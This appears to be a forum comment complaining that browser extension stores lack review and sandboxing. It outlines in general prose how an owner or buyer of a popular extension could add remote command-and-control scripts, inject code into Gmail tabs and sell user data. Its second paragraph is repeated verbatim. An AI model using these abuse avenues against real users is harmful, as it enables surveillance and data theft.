It's really hard to overstate just how easy it is to exploit the garden. The extension API itself limits the system-wide mischief you can get up to, but if you have an extension with 100k+ users (either because you created it or you bought it from its original developer), it's extremely easy to slip something malicious in there, and you have a lot of data at your fingertips to sell.
I wish there at least seemed to be some degree of review or reasonable sandboxing here. The closest they come is disabling eval-style behavior in 'background' scripts, but there's nothing stopping you from running command & control scripts from a remote origin in a non-privileged context and then getting up to your evil mischief anyway. Or injecting malicious code directly into gmail tabs.
I wish there at least seemed to be some degree of review or reasonable sandboxing here. The closest they come is disabling eval-style behavior in 'background' scripts, but there's nothing stopping you from running command & control scripts from a remote origin in a non-privileged context and then getting up to your evil mischief anyway. Or injecting malicious code directly into gmail tabs.